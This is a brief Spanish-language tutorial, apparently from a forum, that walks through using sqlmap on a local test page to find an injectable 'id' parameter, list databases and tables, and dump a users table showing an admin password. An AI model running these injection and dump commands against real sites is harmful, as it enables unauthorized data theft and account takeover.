Empecemos, después de fijar en nuestro punto de mira la web,
navegamos al directorio de Sqlmap.
Código: Seleccionar todo
jimbo@jimbo-1:~/Escritorio/BT/sqlmap$
Código: Seleccionar todo
$ ./sqlmap.py -u http://localhost/explotable/producto.php?id=5387 --dbs
Código: Seleccionar todo
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
Dice que el parametro id=5387 es vulnerable, y si queremos que pruebe con otros distintos.
¿Para qué queremos que siga testeando si ya tenemos el agujero?
Para nada, pues le decimos que no, tecleando
Código: Seleccionar todo
n
Cuando termine recibiremos las bases de datos
Código: Seleccionar todo
[12:51:29] [INFO] fetching database names
[12:51:29] [INFO] fetching number of databases
[12:51:29] [INFO] retrieved: 2
[12:51:34] [INFO] retrieved: information_schema
[12:53:07] [INFO] retrieved: jimboprogram
available databases [2]:
[*] information_schema
[*] jimboprogram
Código: Seleccionar todo
$ ./sqlmap.py -u http://localhost/explotable/producto.php?id=5387 -D jimboprogram --tables
Código: Seleccionar todo
[7 tables]
+------------+
| encuestas |
| ips |
| telefonos |
| noticias |
| respuestas |
| secciones |
| usuarios |
+------------+
Pues los usuarios.
Así que tendremos que dumpear para obtener los datos de las columnas de los usuarios.
Código: Seleccionar todo
./sqlmap.py -u http://localhost/explotable/producto.php?id=5387 -D jimboprogram -T usuarios --dump
Código: Seleccionar todo
Database: jimboprogram
Table: usuarios
[1 entry]
+------------+------------+-------+----------+-------+------------+
| fechacad | id_usuario | otro1 | pass | tipo | usuario |
+------------+------------+-------+----------+-------+------------+
| 0000-00-00 | 1 | 0 | jimbo123 | admin | administrador |
+------------+------------+-------+----------+-------+------------+
Espero que les haya quedado claro.
Paz hermanos